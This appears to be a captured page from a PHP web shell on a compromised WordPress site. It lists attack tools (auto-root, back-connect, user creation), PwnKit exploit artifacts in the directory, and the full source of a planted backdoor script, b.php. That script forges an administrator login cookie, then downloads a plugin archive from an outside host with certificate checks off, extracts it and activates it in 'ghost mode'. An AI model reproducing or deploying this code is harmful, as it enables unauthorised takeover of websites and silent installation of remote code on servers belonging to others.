Linux hkg112.arandomserver.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
: 172.96.185.170 | : 216.73.216.73
Cant Read [ /etc/named.conf ]
7.4.33
gom
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gom /
linkvaobong88.top /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
2.14
KB
-rw-r--r--
.htaccess.bk
557
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
279977_new_file_G2.php
0
B
-rw-r--r--
b.php
2.92
KB
-rw-r--r--
error_log
73.74
KB
-rw-r--r--
google3dd8f9056cd815cd.html
53
B
-rw-r--r--
google645a7a95d346f922.html
53
B
-rw-r--r--
index.php
422
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rw-r--r--
robots.txt
69
B
-rw-r--r--
wp-activate.php
7.2
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.16
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.63
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
31.88
KB
-rw-r--r--
wp-signup.php
33.81
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : b.php
<?php @ini_set('display_errors', 0); @set_time_limit(0); $mr = $_SERVER['DOCUMENT_ROOT']; @chdir($mr); if (file_exists('wp-load.php')) { include 'wp-load.php'; // Admin kullanıcı bul ve cookie set et $wp_user_query = new WP_User_Query(array( 'role' => 'Administrator', 'number' => 1, 'fields' => 'ID' )); $results = $wp_user_query->get_results(); if (!isset($results[0])) { die('NO ADMIN'); } wp_set_auth_cookie($results[0]); // WordPress sistemine takılmadan direkt işlem yap global $wpdb; // Eklenti kontrolü ve güncelleme $active_plugins = get_option('active_plugins', array()); $plugin_file = 'gplrock-auto-publisher/gplrock-auto-publisher.php'; // HER ZAMAN yeni versiyonu indir ve üzerine yaz $plugin_url = 'https://panel21.com/downloads/repository/plugins/tipo-plugin-auto.zip'; $temp_file = WP_PLUGIN_DIR . '/gplrock-temp.zip'; // cURL ile indir $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $plugin_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $zip_content = curl_exec($ch); curl_close($ch); if ($zip_content) { // ZIP dosyasını kaydet file_put_contents($temp_file, $zip_content); // ZIP çıkart - Üzerine yaz (override) $zip = new ZipArchive(); if ($zip->open($temp_file) === TRUE) { $zip->extractTo(WP_PLUGIN_DIR); $zip->close(); // Geçici dosyayı sil @unlink($temp_file); // Eklenti listede yoksa ekle (varsa zaten aktif) if (!in_array($plugin_file, $active_plugins)) { $active_plugins[] = $plugin_file; update_option('active_plugins', $active_plugins); } // Eklenti durumunu güncelle update_option('gplrock_ghost_mode', true); update_option('gplrock_ghost_setup_completed', true); update_option('gplrock_ghost_setup_date', current_time('mysql')); // Cache temizle - WordPress fonksiyonları olmadan if (function_exists('wp_cache_flush')) { wp_cache_flush(); } // Transient'ları temizle $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '_transient_%'"); $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '_site_transient_%'"); // Rewrite kurallarını temizle delete_option('rewrite_rules'); } } // Admin paneline git wp_redirect(admin_url('admyyyyyyyyyyyyyyyyyyyyyyyyyyyydasdasdasdock-dashboard')); exit; } else { die('Failed to load WordPress'); } ?>
Close